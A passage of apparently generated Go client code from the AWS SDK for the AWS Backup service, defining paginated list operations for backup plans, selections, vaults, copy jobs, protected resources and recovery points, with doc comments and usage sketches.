// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupPlans
func (c *Backup) ListBackupPlansRequest(input *ListBackupPlansInput) (req *request.Request, output *ListBackupPlansOutput) {
op := &request.Operation{
Name: opListBackupPlans,
HTTPMethod: "GET",
HTTPPath: "/backup/plans/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListBackupPlansInput{}
}
output = &ListBackupPlansOutput{}
req = c.newRequest(op, input, output)
return
}
// ListBackupPlans API operation for AWS Backup.
//
// Returns a list of existing backup plans for an authenticated account. The
// list is populated only if the advanced option is set for the backup plan.
// The list contains information such as Amazon Resource Names (ARNs), plan
// IDs, creation and deletion dates, version IDs, plan names, and creator request
// IDs.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListBackupPlans for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupPlans
func (c *Backup) ListBackupPlans(input *ListBackupPlansInput) (*ListBackupPlansOutput, error) {
req, out := c.ListBackupPlansRequest(input)
return out, req.Send()
}
// ListBackupPlansWithContext is the same as ListBackupPlans with the addition of
// the ability to pass a context and additional request options.
//
// See ListBackupPlans for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupPlansWithContext(ctx aws.Context, input *ListBackupPlansInput, opts ...request.Option) (*ListBackupPlansOutput, error) {
req, out := c.ListBackupPlansRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListBackupPlansPages iterates over the pages of a ListBackupPlans operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListBackupPlans method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListBackupPlans operation.
// pageNum := 0
// err := client.ListBackupPlansPages(params,
// func(page *backup.ListBackupPlansOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListBackupPlansPages(input *ListBackupPlansInput, fn func(*ListBackupPlansOutput, bool) bool) error {
return c.ListBackupPlansPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListBackupPlansPagesWithContext is the same as ListBackupPlansPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupPlansPagesWithContext(ctx aws.Context, input *ListBackupPlansInput, fn func(*ListBackupPlansOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListBackupPlansInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListBackupPlansRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListBackupPlansOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
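// MaxResults caps the size of each page, not the total number of results; a
// sketch requesting small pages (the value 10 is arbitrary).
//
//    err := svc.ListBackupPlansPages(
//        &backup.ListBackupPlansInput{MaxResults: aws.Int64(10)},
//        func(page *backup.ListBackupPlansOutput, lastPage bool) bool {
//            for _, plan := range page.BackupPlansList {
//                fmt.Println(aws.StringValue(plan.BackupPlanId), aws.StringValue(plan.BackupPlanName))
//            }
//            return true
//        })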
const opListBackupSelections = "ListBackupSelections"
// ListBackupSelectionsRequest generates a "aws/request.Request" representing the
// client's request for the ListBackupSelections operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListBackupSelections for more information on using the ListBackupSelections
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the ListBackupSelectionsRequest method.
// req, resp := client.ListBackupSelectionsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupSelections
func (c *Backup) ListBackupSelectionsRequest(input *ListBackupSelectionsInput) (req *request.Request, output *ListBackupSelectionsOutput) {
op := &request.Operation{
Name: opListBackupSelections,
HTTPMethod: "GET",
HTTPPath: "/backup/plans/{backupPlanId}/selections/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListBackupSelectionsInput{}
}
output = &ListBackupSelectionsOutput{}
req = c.newRequest(op, input, output)
return
}
// ListBackupSelections API operation for AWS Backup.
//
// Returns an array containing metadata of the resources associated with the
// target backup plan.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListBackupSelections for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupSelections
func (c *Backup) ListBackupSelections(input *ListBackupSelectionsInput) (*ListBackupSelectionsOutput, error) {
req, out := c.ListBackupSelectionsRequest(input)
return out, req.Send()
}
// ListBackupSelectionsWithContext is the same as ListBackupSelections with the addition of
// the ability to pass a context and additional request options.
//
// See ListBackupSelections for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupSelectionsWithContext(ctx aws.Context, input *ListBackupSelectionsInput, opts ...request.Option) (*ListBackupSelectionsOutput, error) {
req, out := c.ListBackupSelectionsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListBackupSelectionsPages iterates over the pages of a ListBackupSelections operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListBackupSelections method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListBackupSelections operation.
// pageNum := 0
// err := client.ListBackupSelectionsPages(params,
// func(page *backup.ListBackupSelectionsOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListBackupSelectionsPages(input *ListBackupSelectionsInput, fn func(*ListBackupSelectionsOutput, bool) bool) error {
return c.ListBackupSelectionsPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListBackupSelectionsPagesWithContext is the same as ListBackupSelectionsPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupSelectionsPagesWithContext(ctx aws.Context, input *ListBackupSelectionsInput, fn func(*ListBackupSelectionsOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListBackupSelectionsInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListBackupSelectionsRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListBackupSelectionsOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
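// Selections are listed per plan, so BackupPlanId is required; a sketch with
// a placeholder plan ID.
//
//    err := svc.ListBackupSelectionsPages(
//        &backup.ListBackupSelectionsInput{BackupPlanId: aws.String("<backup-plan-id>")},
//        func(page *backup.ListBackupSelectionsOutput, lastPage bool) bool {
//            for _, sel := range page.BackupSelectionsList {
//                fmt.Println(aws.StringValue(sel.SelectionName))
//            }
//            return true
//        })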
const opListBackupVaults = "ListBackupVaults"
// ListBackupVaultsRequest generates a "aws/request.Request" representing the
// client's request for the ListBackupVaults operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListBackupVaults for more information on using the ListBackupVaults
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the ListBackupVaultsRequest method.
// req, resp := client.ListBackupVaultsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupVaults
func (c *Backup) ListBackupVaultsRequest(input *ListBackupVaultsInput) (req *request.Request, output *ListBackupVaultsOutput) {
op := &request.Operation{
Name: opListBackupVaults,
HTTPMethod: "GET",
HTTPPath: "/backup-vaults/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListBackupVaultsInput{}
}
output = &ListBackupVaultsOutput{}
req = c.newRequest(op, input, output)
return
}
// ListBackupVaults API operation for AWS Backup.
//
// Returns a list of recovery point storage containers along with information
// about them.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListBackupVaults for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupVaults
func (c *Backup) ListBackupVaults(input *ListBackupVaultsInput) (*ListBackupVaultsOutput, error) {
req, out := c.ListBackupVaultsRequest(input)
return out, req.Send()
}
// ListBackupVaultsWithContext is the same as ListBackupVaults with the addition of
// the ability to pass a context and additional request options.
//
// See ListBackupVaults for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupVaultsWithContext(ctx aws.Context, input *ListBackupVaultsInput, opts ...request.Option) (*ListBackupVaultsOutput, error) {
req, out := c.ListBackupVaultsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListBackupVaultsPages iterates over the pages of a ListBackupVaults operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListBackupVaults method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListBackupVaults operation.
// pageNum := 0
// err := client.ListBackupVaultsPages(params,
// func(page *backup.ListBackupVaultsOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListBackupVaultsPages(input *ListBackupVaultsInput, fn func(*ListBackupVaultsOutput, bool) bool) error {
return c.ListBackupVaultsPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListBackupVaultsPagesWithContext is the same as ListBackupVaultsPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupVaultsPagesWithContext(ctx aws.Context, input *ListBackupVaultsInput, fn func(*ListBackupVaultsOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListBackupVaultsInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListBackupVaultsRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListBackupVaultsOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
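// The Pages helpers wrap the NextToken handshake shown below; a manual loop
// is equivalent when finer control is needed (error handling abbreviated).
//
//    input := &backup.ListBackupVaultsInput{}
//    for {
//        out, err := svc.ListBackupVaults(input)
//        if err != nil {
//            break
//        }
//        for _, vault := range out.BackupVaultList {
//            fmt.Println(aws.StringValue(vault.BackupVaultName))
//        }
//        if out.NextToken == nil {
//            break // no more pages
//        }
//        input.NextToken = out.NextToken
//    }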
const opListCopyJobs = "ListCopyJobs"
// ListCopyJobsRequest generates a "aws/request.Request" representing the
// client's request for the ListCopyJobs operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListCopyJobs for more information on using the ListCopyJobs
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the ListCopyJobsRequest method.
// req, resp := client.ListCopyJobsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListCopyJobs
func (c *Backup) ListCopyJobsRequest(input *ListCopyJobsInput) (req *request.Request, output *ListCopyJobsOutput) {
op := &request.Operation{
Name: opListCopyJobs,
HTTPMethod: "GET",
HTTPPath: "/copy-jobs/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListCopyJobsInput{}
}
output = &ListCopyJobsOutput{}
req = c.newRequest(op, input, output)
return
}
// ListCopyJobs API operation for AWS Backup.
//
// Returns metadata about your copy jobs.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListCopyJobs for usage and error information.
//
// Returned Error Types:
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListCopyJobs
func (c *Backup) ListCopyJobs(input *ListCopyJobsInput) (*ListCopyJobsOutput, error) {
req, out := c.ListCopyJobsRequest(input)
return out, req.Send()
}
// ListCopyJobsWithContext is the same as ListCopyJobs with the addition of
// the ability to pass a context and additional request options.
//
// See ListCopyJobs for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListCopyJobsWithContext(ctx aws.Context, input *ListCopyJobsInput, opts ...request.Option) (*ListCopyJobsOutput, error) {
req, out := c.ListCopyJobsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListCopyJobsPages iterates over the pages of a ListCopyJobs operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListCopyJobs method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListCopyJobs operation.
// pageNum := 0
// err := client.ListCopyJobsPages(params,
// func(page *backup.ListCopyJobsOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListCopyJobsPages(input *ListCopyJobsInput, fn func(*ListCopyJobsOutput, bool) bool) error {
return c.ListCopyJobsPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListCopyJobsPagesWithContext is the same as ListCopyJobsPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListCopyJobsPagesWithContext(ctx aws.Context, input *ListCopyJobsInput, fn func(*ListCopyJobsOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListCopyJobsInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListCopyJobsRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListCopyJobsOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
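// ListCopyJobsInput supports server-side filters such as ByState; a sketch
// listing only completed copy jobs, using the CopyJobStateCompleted enum
// value defined in this package.
//
//    err := svc.ListCopyJobsPages(
//        &backup.ListCopyJobsInput{ByState: aws.String(backup.CopyJobStateCompleted)},
//        func(page *backup.ListCopyJobsOutput, lastPage bool) bool {
//            for _, job := range page.CopyJobs {
//                fmt.Println(aws.StringValue(job.CopyJobId))
//            }
//            return true
//        })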
const opListProtectedResources = "ListProtectedResources"
// ListProtectedResourcesRequest generates a "aws/request.Request" representing the
// client's request for the ListProtectedResources operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListProtectedResources for more information on using the ListProtectedResources
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the ListProtectedResourcesRequest method.
// req, resp := client.ListProtectedResourcesRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListProtectedResources
func (c *Backup) ListProtectedResourcesRequest(input *ListProtectedResourcesInput) (req *request.Request, output *ListProtectedResourcesOutput) {
op := &request.Operation{
Name: opListProtectedResources,
HTTPMethod: "GET",
HTTPPath: "/resources/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListProtectedResourcesInput{}
}
output = &ListProtectedResourcesOutput{}
req = c.newRequest(op, input, output)
return
}
// ListProtectedResources API operation for AWS Backup.
//
// Returns an array of resources successfully backed up by AWS Backup, including
// the time the resource was saved, an Amazon Resource Name (ARN) of the resource,
// and a resource type.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListProtectedResources for usage and error information.
//
// Returned Error Types:
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListProtectedResources
func (c *Backup) ListProtectedResources(input *ListProtectedResourcesInput) (*ListProtectedResourcesOutput, error) {
req, out := c.ListProtectedResourcesRequest(input)
return out, req.Send()
}
// ListProtectedResourcesWithContext is the same as ListProtectedResources with the addition of
// the ability to pass a context and additional request options.
//
// See ListProtectedResources for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListProtectedResourcesWithContext(ctx aws.Context, input *ListProtectedResourcesInput, opts ...request.Option) (*ListProtectedResourcesOutput, error) {
req, out := c.ListProtectedResourcesRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListProtectedResourcesPages iterates over the pages of a ListProtectedResources operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListProtectedResources method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListProtectedResources operation.
// pageNum := 0
// err := client.ListProtectedResourcesPages(params,
// func(page *backup.ListProtectedResourcesOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListProtectedResourcesPages(input *ListProtectedResourcesInput, fn func(*ListProtectedResourcesOutput, bool) bool) error {
return c.ListProtectedResourcesPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListProtectedResourcesPagesWithContext is the same as ListProtectedResourcesPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListProtectedResourcesPagesWithContext(ctx aws.Context, input *ListProtectedResourcesInput, fn func(*ListProtectedResourcesOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListProtectedResourcesInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListProtectedResourcesRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListProtectedResourcesOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
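// A sketch printing the ARN and last backup time of each protected resource;
// the chosen fields are illustrative and svc is an initialized client.
//
//    err := svc.ListProtectedResourcesPages(&backup.ListProtectedResourcesInput{},
//        func(page *backup.ListProtectedResourcesOutput, lastPage bool) bool {
//            for _, res := range page.Results {
//                fmt.Println(aws.StringValue(res.ResourceArn), aws.TimeValue(res.LastBackupTime))
//            }
//            return true
//        })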
const opListRecoveryPointsByBackupVault = "ListRecoveryPointsByBackupVault"
// ListRecoveryPointsByBackupVaultRequest generates a "aws/request.Request" representing the
// client's request for the ListRecoveryPointsByBackupVault operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListRecoveryPointsByBackupVault for more information on using the ListRecoveryPointsByBackupVault
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the ListRecoveryPointsByBackupVaultRequest method.
// req, resp := client.ListRecoveryPointsByBackupVaultRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListRecoveryPointsByBackupVault
func (c *Backup) ListRecoveryPointsByBackupVaultRequest(input *ListRecoveryPointsByBackupVaultInput) (req *request.Request, output *ListRecoveryPointsByBackupVaultOutput) {
op := &request.Operation{
Name: opListRecoveryPointsByBackupVault,
HTTPMethod: "GET",
HTTPPath: "/backup-vaults/{backupVaultName}/recovery-points/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListRecoveryPointsByBackupVaultInput{}
}
output = &ListRecoveryPointsByBackupVaultOutput{}
req = c.newRequest(op, input, output)
return
}
// ListRecoveryPointsByBackupVault API operation for AWS Backup.
//
// Returns detailed information about the recovery points stored in a backup
// vault.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListRecoveryPointsByBackupVault for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListRecoveryPointsByBackupVault
func (c *Backup) ListRecoveryPointsByBackupVault(input *ListRecoveryPointsByBackupVaultInput) (*ListRecoveryPointsByBackupVaultOutput, error) {
req, out := c.ListRecoveryPointsByBackupVaultRequest(input)
return out, req.Send()
}
// ListRecoveryPointsByBackupVaultWithContext is the same as ListRecoveryPointsByBackupVault with the addition of
// the ability to pass a context and additional request options.
//
// See ListRecoveryPointsByBackupVault for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListRecoveryPointsByBackupVaultWithContext(ctx aws.Context, input *ListRecoveryPointsByBackupVaultInput, opts ...request.Option) (*ListRecoveryPointsByBackupVaultOutput, error) {
req, out := c.ListRecoveryPointsByBackupVaultRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListRecoveryPointsByBackupVaultPages iterates over the pages of a ListRecoveryPointsByBackupVault operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListRecoveryPointsByBackupVault method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListRecoveryPointsByBackupVault operation.
// pageNum := 0
// err := client.ListRecoveryPointsByBackupVaultPages(params,
// func(page *backup.ListRecoveryPointsByBackupVaultOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListRecoveryPointsByBackupVaultPages(input *ListRecoveryPointsByBackupVaultInput, fn func(*ListRecoveryPointsByBackupVaultOutput, bool) bool) error {
return c.ListRecoveryPointsByBackupVaultPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListRecoveryPointsByBackupVaultPagesWithContext is the same as ListRecoveryPointsByBackupVaultPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListRecoveryPointsByBackupVaultPagesWithContext(ctx aws.Context, input *ListRecoveryPointsByBackupVaultInput, fn func(*ListRecoveryPointsByBackupVaultOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListRecoveryPointsByBackupVaultInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListRecoveryPointsByBackupVaultRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListRecoveryPointsByBackupVaultOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
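// Recovery points are listed per vault, so BackupVaultName is required; a
// sketch with a placeholder vault name.
//
//    err := svc.ListRecoveryPointsByBackupVaultPages(
//        &backup.ListRecoveryPointsByBackupVaultInput{BackupVaultName: aws.String("<vault-name>")},
//        func(page *backup.ListRecoveryPointsByBackupVaultOutput, lastPage bool) bool {
//            for _, rp := range page.RecoveryPoints {
//                fmt.Println(aws.StringValue(rp.RecoveryPointArn))
//            }
//            return true
//        })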
const opListRecoveryPointsByResource = "ListRecoveryPointsByResource"
// ListRecoveryPointsByResourceRequest generates a "aws/request.Request" representing the
// client's request for the ListRecoveryPointsByResource operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListRecoveryPointsByResource for more information on using the ListRecoveryPointsByResource
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the ListRecoveryPointsByResourceRequest method.
// req, resp := client.ListRecoveryPointsByResourceRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListRecoveryPointsByResource
func (c *Backup) ListRecoveryPointsByResourceRequest(input *ListRecoveryPointsByResourceInput) (req *request.Request, output *ListRecoveryPointsByResourceOutput) {
op := &request.Operation{
Name: opListRecoveryPointsByResource,
HTTPMethod: "GET",
HTTPPath: "/resources/{resourceArn}/recovery-points/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListRecoveryPointsByResourceInput{}
}
output = &ListRecoveryPointsByResourceOutput{}
req = c.newRequest(op, input, output)
return
}
// ListRecoveryPointsByResource API operation for AWS Backup.
//
// Returns detailed information about recovery points of the type specified
// by a resource Amazon Resource Name (ARN).
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListRecoveryPointsByResource for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
